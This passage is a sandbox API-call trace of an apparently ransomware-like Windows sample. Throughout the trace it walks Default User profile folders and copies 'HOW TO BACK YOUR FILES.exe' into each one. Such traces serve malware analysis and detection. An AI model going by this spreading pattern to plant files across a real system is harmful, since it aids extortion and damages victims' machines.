FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.631] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.631] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.631] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.631] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" [0078.631] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.631] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.632] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.632] GetLastError () returned 0x0 [0078.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.632] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.632] CloseHandle (hObject=0xa4) returned 1 [0078.632] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.632] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.632] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.632] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.633] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Credentials" [0078.633] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Credentials" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Credentials") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Credentials" [0078.633] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.633] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.633] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.634] GetLastError () returned 0x0 [0078.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.634] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.634] CloseHandle (hObject=0xa4) returned 1 [0078.634] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.634] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.634] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.634] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.634] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\History", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\History" [0078.634] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\History" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\History") returned="C:\\Documents and Settings\\Default User\\Local Settings\\History" [0078.635] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.635] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.635] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.635] GetLastError () returned 0x0 [0078.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.635] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.635] CloseHandle (hObject=0xa4) returned 1 [0078.636] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.636] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.636] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.636] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.636] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\History\\Low" [0078.636] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\History\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\History\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\History\\Low" [0078.636] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.636] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.637] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.637] GetLastError () returned 0x0 [0078.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.637] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.637] CloseHandle (hObject=0xa4) returned 1 [0078.637] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.637] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.638] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.638] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.638] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\History\\History.IE5" [0078.638] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\History\\History.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\History\\History.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\History\\History.IE5" [0078.638] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.638] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.638] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.639] GetLastError () returned 0x0 [0078.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.639] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.639] CloseHandle (hObject=0xa4) returned 1 [0078.639] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.639] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.639] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.639] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.639] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data" [0078.639] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data" [0078.639] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.639] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.640] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.640] GetLastError () returned 0x0 [0078.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.640] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.640] CloseHandle (hObject=0xa4) returned 1 [0078.640] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.640] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.641] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.641] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" [0078.641] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files" [0078.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.642] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.642] GetLastError () returned 0x0 [0078.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.642] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.642] CloseHandle (hObject=0xa4) returned 1 [0078.642] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.642] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.642] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.642] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.643] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" [0078.643] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized" [0078.643] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.643] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.643] GetLastError () returned 0x0 [0078.643] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.644] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.644] CloseHandle (hObject=0xa4) returned 1 [0078.644] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.644] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.644] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.644] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.644] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" [0078.644] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low" [0078.644] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.644] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.645] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.645] GetLastError () returned 0x0 [0078.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.645] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.645] CloseHandle (hObject=0xa4) returned 1 [0078.645] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.645] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.645] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.645] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.646] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.646] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.646] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.646] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK 